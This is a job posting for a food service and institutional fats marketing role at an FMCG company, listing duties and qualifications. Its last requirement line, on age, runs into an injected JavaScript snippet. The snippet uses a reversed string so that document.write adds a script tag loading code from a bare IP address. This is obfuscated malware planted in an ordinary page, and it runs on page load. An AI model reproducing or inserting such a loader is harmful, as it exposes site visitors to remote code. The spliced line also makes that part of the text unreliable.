Industry : FMCG
Report To: General Sales Manager, Food Service
Work Day : 5 day + alt at half day
– Manage the Food Service & Institutional Fats product business portfolio to achieve continuously growth in sales and profitability.
– Assist the General Sales Manager to strengthen the food service sales structure to increase market reach; and enhance human talents with emphasis on training for better professionalism in serving channel segments more effectively.
– Monitor the daily market price fluctuation of primary raw materials and competitors’ prices closely; and prepare to set the best price & competitive gap for Institutional Fats to bring about sustaining sales contribution and profitability
– Resourcefully in gathering intelligence for the computation to study market sizes & annual growth rate; brand share; sales trends; competitors pricing; product research (including statutory regulatory and custom tariff), and any other competitive information as guidance for the Company in evaluating the interest for developing new product categories.
– Develop new key customers jointly with Sales team to increase market share and penetration. Provide technical information and customer support to trade enquiries or product application / complaints as and when needed.
– Managing the demand forecast planning of Institutional Fats stock requirement for factory to plan production in ensuring timely and sufficient supply of stock to meet sales demand.
– To lead and work with R&D in developing new products and/or improve existing products to meet the brand & marketing concepts/objectives, consumer trends; and including custom-made formulation fats for specific high volume institutional customers.
– To continuously strengthen mutual and beneficial trading relationships with external parties including customers, advertising agencies and suppliers through enhancing value to meet the agreed brand & marketing objectives.
– To lead & facilitate product sales training to enhance better professionalism among the food service sales team to continuously strengthen customers’ satisfaction.
– Spearhead and manages all marketing programs conducted together with Marketing / Agency brand custodians, to ensure smooth execution of planned activities; and up-keeping the maintenance of all kitchen equipment and utilities always in good, hygienic and orderly operational conditions.
– Perform other related business duties and responsibilities as assigned by the superior from time to time.
– Degree in Food Science/ Food Technology/ Chemistry / Marketing /Business Management or a relevant discipline.
– Possess strong analytical, written and oral communication, good interpersonal and presentation skills.
– Familiar with Microsoft Office applications, Movex and other business intelligence tools.
– Able to work independently with minimum supervision.
– At least 5 years of similar experience capacity in marketing & sales of food products in food service or institutional business.
– Exposure in food manufacturing and knowledge on the working process of quality management system will be an advantage.
– 40-45 years document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))
To apply for this job email your details to firstname.lastname@example.org